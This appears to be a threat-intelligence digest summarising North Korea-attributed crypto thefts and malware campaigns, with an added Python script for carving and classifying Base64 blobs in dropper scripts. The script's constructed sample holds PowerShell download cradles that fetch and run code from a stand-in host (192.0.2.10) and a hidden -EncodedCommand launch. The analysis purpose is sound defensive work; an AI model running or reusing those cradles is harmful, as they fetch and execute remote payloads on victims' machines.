CertiK reports that the Heco Bridge and HTX hot-wallet compromise caused about $113.3 million in suspicious losses across Ethereum, TRON, and possibly Bitcoin. The bridge loss followed compromise of the Heco Bridge operator wallet, allowing withdrawToken …
A November 2023 archived X post attributed a cluster of cryptocurrency thefts to North Korean state-sponsored hackers, also known as Lazarus Group, listing HTX/HECO, Poloniex, CoinEx, Stake, Alphapo/CoinsPaid, and Atomic Wallet. The post put losses at abou…
For software supply-chain attacks, DPRK state-linked cyber actors have used zero-day exploits and newly published vulnerabilities and tools, and have chained multiple vulnerabilities in series to hit a specific target precisely. See the IoC sectio…
REKT reported that HECO Bridge and HTX lost about $99 million in back-to-back attacks on Sun-linked crypto platforms, with $86.6 million drained from the HECO Ethereum bridge and $12.5 million from HTX hot wallets. The attack narrative identifies a compro…
Microsoft attributes a CyberLink supply-chain compromise to Diamond Sleet, a North Korea-based actor also tracked as ZINC, Temp.Hermit, or Labyrinth Chollima. The malicious file was a legitimate CyberLink installer signed with a valid CyberLink certificat…
The first campaign's objective is likely cryptocurrency theft and using compromised targets as a staging environment for additional attacks. Our investigation revealed two new malware families, and tactics used in this campaign align with previously repor…
South Korean police warned that a North Korean hacking organization continued sending impersonation emails posing as government agencies, journalists, and research institutes. The group used malicious attachments to install malware on PCs and phishing URL…
ASEC reported Kimsuky distributing a malicious JSE dropper disguised as an import declaration to South Korean research institutes. The dropper contains obfuscated PowerShell, a Base64-encoded backdoor, and a benign PDF with target information, then writes…
FortiGuard described an ongoing Konni campaign using a Russian-language Word document with malicious macros. When the victim enables content, VBA extracts embedded ZIP contents, runs hidden batch scripts, deploys UPX-packed DLLs, and uses a wusa.exe UAC b…
South Korea's Seoul Central District Prosecutors' Office charged two data-recovery business operators accused of colluding with hackers who deployed Magniber ransomware. Prosecutors said the hackers encrypted victims' files and shared ransomware timing an…
There have also been cases in which the Andariel group exploited other vulnerabilities during the attack process to distribute malware. The Andariel group is one of the threat groups most active in South Korea, alongside the Kimsuky and La…
The source attributes a November 2023 billing themed HTML and LNK malware chain to APT37, also known as Reaper, Group123, RedEyes, ScarCruft, or Ricochet Chollima. The lure is distributed as a ZIP containing an HWP decoy and a malicious LNK that launches …
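The three script-dropper chains summarized above (Kimsuky's JSE carrying obfuscated PowerShell, a Base64-encoded backdoor and a decoy PDF; Konni's VBA extracting an embedded archive and batch stages; APT37's ZIP with an HWP decoy and a LNK launcher) share one first triage step: carve the Base64 runs out of the first-stage script and find out what each one decodes to before anything is detonated. The Python script below is an added example written for this page, not code from ASEC, FortiGuard or the source cited above. The JSE-style snippet, the payload strings and the 192.0.2.10 address are constructed sample input, not indicators from the reports; the Base64 run length threshold and the PowerShell marker list are assumptions a practitioner would tune per case.

```python
import base64
import binascii
import re

# Runs of Base64 alphabet long enough to be worth decoding (shorter runs are
# mostly identifiers). Trailing '=' padding is optional because droppers often
# strip it and re-pad at runtime. The 40-char threshold is an assumption.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# File-type magics commonly seen in dropper stages: PE, ZIP/OOXML, PDF decoy, ELF.
MAGICS = [
    (b"MZ", "PE executable"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"%PDF", "PDF document"),
    (b"\x7fELF", "ELF executable"),
]

# Lower-cased tokens that mark a decoded blob as a PowerShell stage (assumed list).
PS_MARKERS = (b"powershell", b"invoke-expression", b"iex", b"frombase64string",
              b"downloadstring", b"-encodedcommand", b"new-object")


def looks_utf16le(blob: bytes) -> bool:
    """powershell -EncodedCommand takes Base64 of UTF-16LE text, so an ASCII
    command decodes to bytes whose every odd byte is zero."""
    return len(blob) >= 8 and len(blob) % 2 == 0 and all(b == 0 for b in blob[1::2])


def classify(blob: bytes) -> str:
    """Label a decoded blob by magic bytes, then by PowerShell markers."""
    for magic, label in MAGICS:
        if blob.startswith(magic):
            return label
    if looks_utf16le(blob):
        text = blob.decode("utf-16-le", errors="replace").encode().lower()
        if any(m in text for m in PS_MARKERS):
            return "PowerShell (UTF-16LE encoded command)"
    low = blob.lower()
    if any(m in low for m in PS_MARKERS):
        return "PowerShell"
    return "unknown"


def carve(data: bytes) -> list:
    """Return every decodable Base64 run in data with its offset, length and type."""
    findings = []
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        padded = run + b"=" * (-len(run) % 4)  # re-pad stripped Base64
        try:
            decoded = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue  # alphabet-looking but not valid Base64 (e.g. a long identifier)
        findings.append({
            "offset": m.start(),
            "b64_len": len(run),
            "type": classify(decoded),
            "decoded": decoded,
        })
    return findings


def summarize(data: bytes) -> list:
    """Compact view for a triage note: (offset, decoded size, type)."""
    return [(f["offset"], len(f["decoded"]), f["type"]) for f in carve(data)]


# Constructed sample, not a real dropper: a JSE-style first stage carrying a
# decoy PDF, a PowerShell download cradle and an -EncodedCommand stage.
# 192.0.2.10 is a documentation address, not an indicator.
DECOY_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
PS_STAGE = (b"powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
            b".DownloadString('http://192.0.2.10/stage2')\"")
PS_ENCODED = ("Invoke-Expression (New-Object Net.WebClient)"
              ".DownloadString('http://192.0.2.10/stage3')").encode("utf-16-le")

SAMPLE_JSE = (
    b"var decoy = '" + base64.b64encode(DECOY_PDF) + b"';\n"
    b"var cradle = '" + base64.b64encode(PS_STAGE) + b"';\n"
    b"var enc = '" + base64.b64encode(PS_ENCODED) + b"';\n"
    b"var sh = new ActiveXObject('WScript.Shell');\n"
    b"sh.Run('powershell -EncodedCommand ' + enc, 0);\n"
)

if __name__ == "__main__":
    for offset, size, kind in summarize(SAMPLE_JSE):
        print(f"offset {offset:5d}  {size:5d} bytes  {kind}")
```

Run it against a real first stage by replacing SAMPLE_JSE with the file's bytes; the decoy document is what gets written next to the victim for show, and the PowerShell blobs are where the next-stage URL or backdoor lives. Droppers that split, reverse or character-substitute their Base64 will defeat the single regex, which is why the carver reports offsets: a run that decodes to "unknown" at the position where the script's own code references a decode routine is the one to deobfuscate by hand.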
A compromised Uno Re deployer private key let an attacker transfer contract ownership, alter the claims assessor role, and drain SSIP, SSRP, and Rewarder contracts. Uno Re reported losses of 32.4 million UNO, 127.9 thousand USDC, 59.3 thousand USDT, and 1…
ASEC assessed that Andariel may have abused the Apache ActiveMQ remote code execution flaw CVE-2023-46604 to install NukeSped and TigerRat backdoors on exposed servers. The evidence is circumstantial: the affected system was repeatedly hit after public di…
CertiK describes the November 2023 Poloniex compromise as a private-key incident affecting Ethereum, Tron, and Bitcoin wallets, with losses estimated at about $132 million. The stolen assets moved through at least 681 wallets, including large ERC-20 swaps…